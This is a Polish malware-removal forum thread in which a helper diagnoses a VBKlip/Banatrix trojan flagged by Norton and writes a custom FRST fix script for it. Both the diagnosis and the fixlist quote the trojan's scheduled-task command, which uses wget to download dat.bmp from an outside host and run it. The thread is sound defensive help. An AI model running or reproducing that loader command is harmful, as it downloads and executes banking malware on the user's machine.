Problem dat.bmp

[bossnec]

Witam od jakiegoś czasu Norton pokazuje mi że mam problem z dat.bmp a konkretnie:

 

Norton wykrywa go jako:

Discovered: April 4, 2014 Updated: April 4, 2014 2:37:58 PM Type: Trojan Systems Affected: Windows 2000, Windows 7, Windows 95, Windows 98, Windows Me, Windows NT, Windows Server 2003, Windows Server 2008, Windows Vista, Windows XP

Trojan.Asprox.B is a Trojan horse that downloads other threats onto the compromised computer.
 

Antivirus Protection Dates

• Initial Rapid Release version April 4, 2014 revision 019
• Latest Rapid Release version April 9, 2015 revision 055
• Initial Daily Certified version April 4, 2014 revision 008
• Latest Daily Certified version April 9, 2015 revision 049
• Initial Weekly Certified release date April 9, 2014

Click here for a more detailed description of Rapid Release and Daily Certified virus definitions.

Threat Assessment Wild

• Wild Level: Low
• Number of Infections: 0 - 49
• Number of Sites: 0 - 2
• Geographical Distribution: Low
• Threat Containment: Easy
• Removal: Easy

Damage

• Damage Level: Medium
• Payload: Downloads and executes malicious files on the compromised computer.

Distribution

• Distribution Level: Low

Writeup By: Kevin Savage

 

 

Shortcut.txt

FRST.txt

Addition.txt

[Rucek]

Sprobuj jeszcze zrobic log GMER. Tutaj masz instrukcje: https://www.fixitpc.pl/topic/60-diagnostyka-infekcje-typu-rootkit/?do=findComment&comment=318

[picasso]

W systemie rezyduje wariant VBKlip/Banatrix uruchamiany za pomocą Harmonogramu zadań:

 

Task: {A7F008C4-62AB-406C-99E6-6EFED26D80EA} - System32\Tasks\SYSTEM => cmd.exe /R cd "C:\ProgramData" & ping 1.1.1.1 -n 300 -w 1000 & wget -t 0 --retry-connrefused -O dat.bmp hxxp://grogle.in/dat.bmp?data=UPc5bO93E9;Sony_Movie_Studio_Platinum_12.0.896_64-bit.exe;1423084229 & start cmd /R dat.bmp

 

Poza tym są drobne śmieci w Firefox (vShare), prawdopodobnie "skrupulatnie" sejwowane via MozillaBackup... Akcja do przeprowadzenia:

 

1. Przez Panel sterowania odinstaluj stare wersje: Adobe Flash Player 14 ActiveX, Java 7 Update 25 (64-bit), Java 8 Update 31 (64-bit), Java 8 Update 31, Mozilla ActiveX Control v1.7.12.

 

2. Otwórz Notatnik i wklej w nim:

 

CloseProcesses:
CreateRestorePoint:
Task: {A7F008C4-62AB-406C-99E6-6EFED26D80EA} - System32\Tasks\SYSTEM => cmd.exe /R cd "C:\ProgramData" & ping 1.1.1.1 -n 300 -w 1000 & wget -t 0 --retry-connrefused -O dat.bmp http://grogle.in/dat.bmp?data=UPc5bO93E9;Sony_Movie_Studio_Platinum_12.0.896_64-bit.exe;1423084229 & start cmd /R dat.bmp 
Task: {3C4A7BDA-9998-4792-A2CE-E1CD4F1C6A54} - System32\Tasks\{AFF18EBF-6EF0-470C-9825-CEA0CA7A31FF} => pcalua.exe -a "F:\@@@ MSDN\Visual Studio 2010 Professional Language Pack (x86) - (Polish)\HelpSetupLP_x86_plk.exe" -d "F:\@@@ MSDN\Visual Studio 2010 Professional Language Pack (x86) - (Polish)"
HKLM\...\Run: [Nvtmru] => "C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\nvtmru.exe"
HKU\S-1-5-21-3689681616-363825201-3988283093-1000\...\Run: [AdobeBridge] => [X]
FF user.js: detected! => C:\Users\Necron\AppData\Roaming\Mozilla\Firefox\Profiles\64afss3f.default\user.js [2015-03-31]
FF Extension: vShare - C:\Users\Necron\AppData\Roaming\Mozilla\Firefox\Profiles\64afss3f.default\Extensions\vshare@toolbar [2013-08-14]
S3 NTIOLib_1_0_C; \??\D:\NTIOLib_X64.sys [X]
CustomCLSID: HKU\S-1-5-21-3689681616-363825201-3988283093-1000_Classes\CLSID\{073CB204-6B29-46FC-AB98-451F1D068741}\InprocServer32 -> E:\Program Files\3dsmax\3ds Max 2015\Inventor Server\Bin\TestServer.dll No File
CustomCLSID: HKU\S-1-5-21-3689681616-363825201-3988283093-1000_Classes\CLSID\{8C23B656-4E6E-4B45-9920-9617168D39A3}\InprocServer32 -> E:\Program Files\3dsmax\3ds Max 2015\Inventor Server\Bin\TestServer.dll No File
CustomCLSID: HKU\S-1-5-21-3689681616-363825201-3988283093-1000_Classes\CLSID\{E5B0515D-48D2-4F04-906D-0192ED65A2DD}\InprocServer32 -> E:\Program Files\3dsmax\3ds Max 2015\Inventor Server\Bin\TestServer.dll No File
C:\ProgramData\dat.bmp
C:\ProgramData\wget.exe
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Call of Duty Advanced Warfare
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Foto2Avi
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\OpenRA
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\SunAge Battle for Elysium Remastered
C:\Windows\system32\*.tmp
EmptyTemp:

 

Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach.

 

Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Fix. Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, system zostanie zresetowany. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt.

 

3. Zrób nowy log FRST z opcji Scan, zaznacz ponownie pole Addition, by powstały dwa logi. Dołącz też plik fixlog.txt.